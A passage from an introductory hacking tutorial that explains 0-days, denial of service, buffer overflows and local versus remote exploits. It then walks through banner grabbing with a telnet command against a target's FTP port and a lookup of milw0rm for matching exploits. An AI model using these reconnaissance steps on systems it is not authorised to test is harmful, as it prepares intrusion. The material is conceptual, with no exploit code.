By searching “filezilla” on milw0rm, fortunately the hacker won’t find any exploits for my current version of the FTP software. Now most people would move on to another port to try and find another possible vulnerability, but this doesn’t mean every hacker will. If a skillful hacker is determined, he may try to locate a vulnerability in the current software version and develop an exploit for it. In the hacker community, this new vulnerability would be called a “0-day”. 0-day vulnerabilities are very valuable in the hacker community for a few reasons.
• No one knows about the vulnerability, so the hacker could start hacking hundreds of websites before the vulnerability is discovered and patched.
• The hacker could sell the vulnerability for thousands of dollars.
• Discovering vulnerabilities and creating an exploit for it shows that the hacker is very skillful and raises his ranks in the hacker community.
You might be wondering why 0-days are worth so much. It’s very simple. I’ll explain it with a simple equation.
Hacker + 0-Day + Company Servers = Bad Reputation = Loss of Money
Now before we get into the actual penetrations, I will discuss a couple of the common type of attacks used against discovered vulnerabilities.

Denial-of-Service (DoS) –
There are many types of DoS attacks, but they all have one purpose: to make the target server unavailable for legitimate users. The most common type of DoS attack is when the hacker sends a flood of information to the target server causing it to use up all of its resources, and in return pushing it offline, or causing it to deny requests from legitimate users trying to access it.

Buffer Overflow (BoF) –
A buffer overflow happens when a program attempts to store more data into a buffer, or a data storage area, then it was meant to hold. Because the buffer was only meant to hold a certain amount of data, the extra information overflows into other buffers causing them to be overwritten with malicious code created by the hacker. Once this code is executed, the hacker can receive full control of the server.


If you search the Milw0rm exploit database, you will see that in many exploit titles it reads local exploit or remote exploit. Below are their definitions:
Local Exploit –
To run a local exploit, you must first have access and privileges on the machine. Local exploits are usually used to escalate ones privileges to admin or root. In other words, it allows an ordinary user to gain root privileges.

Remote Exploit –
A remote exploit is pretty much the same thing as a local exploit except that it isn’t run locally, but launched from anywhere across the internet.
A hacker usually has to use a combination of both remote and local exploits to gain full control of a system. For example, the hacker may have been able to gain regular privileges with a remote exploit attack, and then be able to escalate to root privileges with the help of a local exploit.

Network Hacking (Banner Grabbing)

Banner Grabbing
Now that the hacker has a full list of services running on the target system, to be able to exploit them, he has to first figure out what software and version the service is. One way the hacker can get this information, is to telnet into service port. In the example below, we will use command prompt on Windows (Start -> Run -> Type “cmd” -> Enter). If you are on a Mac, you will be using the terminal. Note: If you are using Windows Vista, then telnet is not installed by default. You can install it by doing the following simple steps.

o Click Start then select Control Panel.
o Select Programs and Features.
o Select Turn Windows features on or off.
o Select the Telnet Client option and click OK.
o A box will appear to confirm installation. The telnet command should now be installed

1. First, the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit. Let’s say that when the hacker scanned his target, he found the port 21 open. As you can see on the chart above, port 21 is FTP. To find out what FTP software is running he would use telnet by running the command:
telnet www.targetsite.com 21

As you can see above, I ran this against my computer (localhost). So a hacker would insert a target URL in place of localhost.

 2. Next, it would connect to the target and display a banner telling the hacker the software and its version as shown below. This is the information the hacker needs to continue and begin searching for vulnerabilities for the software discovered.

If the above method doesn’t work for you, then simply use Nmap’s full version detection option to get the information.